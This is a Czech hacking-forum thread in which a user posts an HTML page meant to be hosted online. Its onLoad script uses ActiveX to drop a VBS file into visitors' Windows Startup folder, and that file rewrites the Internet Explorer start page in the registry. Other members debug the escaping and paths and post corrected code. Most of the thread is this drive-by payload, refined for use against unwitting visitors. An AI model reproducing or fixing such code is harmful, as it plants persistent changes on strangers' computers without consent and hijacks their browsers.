IE jako back door

HackForum

IE jako back door#
!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1250">
<title>Loading...</title>
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--
function Writing() {
var filename = 'C://Documents and Settings/All Users/Nabídka Start/Programy/Po spuštění/ahoj.vbs';
var code='Dim Shell
Set Shell=Wscript.CreateObject("Wscript.shell")
Shell.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Inter
net Explorer\Main\Start Page","[link]"
Set shell=nothing';

var fso = new ActiveXObject('Scripting.FileSystemObject')
;
if (fso.FileExists(filename)) {
var ForAppending = 8;
var file = fso.OpenTextFile(filename, ForAppending, false);
file.WriteLine(code);
file.WriteBlankLines(1);
}
else {
var file = fso.CreateTextFile(filename, true);
file.WriteLine(code);
file.WriteBlankLines(1);
}
file.Close();
window.location.href="index.php?show=59";
}
//-->
</SCRIPT>
</head>
<body onLoad='Writing()'>
</body>
</html>

tento soubor jsem nahrál na web a zkusil jsem ho spustit a pak jsem resetoval komp ale ten soubor .vbs se mi nikam nezapsal....kde mám chybu??
(odpovědět)
fisi25.6.2006 14:17
re: IE jako back door#
fisi: Jedna z chyb, ktera me napada je hodnota v promenne code. Lomitka, apostrofy, uvozovky, apd. se musi psat se spetnym lomitkem (\\, \", apd.)a na konci kazdeho radku kodu bys mel dat \r.
(odpovědět)
.cCuMiNn,25.6.2006 14:27
re: IE jako back door#
fisi: Promenna filename je podle me take spatne. Myslim, ze bys to mel mit nejak takhle:
var filename = "C:\\Docu\\All\\Nabidka\\Ahoj.vbs"
(odpovědět)
.cCuMiNn,25.6.2006 14:33
re: IE jako back door#
explorer tam stále hází chybu
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1250">
<title>Loading...</title>
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--
function Writing() {
var filename = 'C:\\Documents and Settings\\All Users\\Nabídka Start\\Programy\\Po spuštění\\ahoj.vbs';
var code='Dim Shell\r
Set Shell=Wscript.CreateObject(\Wscript.shell\)
\r
Shell.regwrite \\HKEY_CURRENT_USER\Software\Microsoft\Inte
rnet Explorer\Main\Start Page\\,\\[link]
Set shell=nothing';\r

var fso = new ActiveXObject('Scripting.FileSystemObject')
;
if (fso.FileExists(filename)) {
var ForAppending = 8;
var file = fso.OpenTextFile(filename, ForAppending, false);
file.WriteLine(code);
file.WriteBlankLines(1);
}
else {
var file = fso.CreateTextFile(filename, true);
file.WriteLine(code);
file.WriteBlankLines(1);
}
file.Close();
window.location.href="index.php?show=59";
}
//-->
</SCRIPT>
</head>
<body onLoad='Writing()'>
</body>
</html>

řádek 59
znak:1
(odpovědět)
fisi25.6.2006 14:47
re: IE jako back door#
.cCuMiNn,>>jak bych tu domovskou stranku zmenil pomoci onLoad??
(odpovědět)
fisi25.6.2006 14:48
re: IE jako back door#
fisi:
Set Shell=Wscript.CreateObject(\"Wscript.shell\
")\r
Set klic=
\"HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page\"\r
Set hodnota=\"[link]"\r
Shell.regwrite klic, hodnota\r
Set shell=nothing\r';

----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem.
(odpovědět)
.cCuMiNn. | E-mail | Website | PGP25.6.2006 15:01
re: IE jako back door#
fisi: Na tvou druhou otázku ti bohužel neodpovim, ale osobně si myslím, že to bude vyžadovat potvrzení uzivatele. Jinak jeden z tvých přispěvků jsem smazal, protože měl moc dlouhý text na jednom řádku a rozhodil to tu, tak jej kdyžtak vlož znovu a ten dlouhý text rozděl mezerou.

----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem.
(odpovědět)
.cCuMiNn. | E-mail | Website | PGP25.6.2006 15:04
re: IE jako back door#
fisi: ještě mi teď došlo, že bys měl místo \r používat \n\r.

----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem.
(odpovědět)
.cCuMiNn. | E-mail | Website | PGP25.6.2006 16:08
re: IE jako back door#
Tu promennou filename jsi mel puvodne spravne, nahraj si na web i index.php a v prohlizeci nacti load.php.
Musis to nacitat pomoci IE a mit povolene zminene pravidlo v registrech...
(odpovědět)
Emkei | E-mail | Website | PGP25.6.2006 16:12
re: IE jako back door#
Emkei: Jak si na tu syntax u toho souboru přišel? Podle mě je totiž spávně ta má varianta, ale pokud by ti to nefungovalo, tak bys to asi nepsal... :)

----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem.
(odpovědět)
.cCuMiNn. | E-mail | Website | PGP25.6.2006 17:26
IE#
sorry ted v tom mam hroznej zmatek co je teda dobre?
(odpovědět)
fisi25.6.2006 17:34
re: IE jako back door#
pls hodte sem ten skript kterej je spravnej prestavam se v tom orientovat
(odpovědět)
fisi25.6.2006 17:35
IE#
jeste bych se chtel zeptat muzete mi doporucit nejakou publikaci abych se naucil psat *.bat nebo *.cmd??
(odpovědět)
fisi25.6.2006 17:51
re: IE jako back door#
var filename = 'C://Documents and Settings/All Users/Nabídka Start/Programy/Po spuštění/change.vbs';
var code='set Shell = CreateObject("WScript.shell")\r\nShell.RegW
rite "HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "[link]", "REG_SZ"';

ad2: Zaklady scriptovani davkovych souboru najdes v napovede Widnows, kazdopadne s timhle uz nema cenu zacinat, mnohem sofistikovanejsi jsou dneska WSH Scripty.
(odpovědět)
Emkei | E-mail | Website | PGP25.6.2006 20:19
re: IE jako back door#
Nápověda windows. Hm, tak to bylo to první co jsem smazal přes nlite :D

----------
nehádej se, nemá to cenu | osobní blog: [link]
(odpovědět)
mzk | E-mail | Website25.6.2006 20:35
re: IE jako back door#
Ty ses trapny hovado!
(odpovědět)
Flame26.6.2006 20:04
re: IE jako back door#
Emkei>>díky!!!
(odpovědět)
fisi25.6.2006 20:43
re: IE jako back door#
.cCuMiNn,>>díky!!!
(odpovědět)
fisi25.6.2006 20:44

Zpět
 
 
 

 
BBCode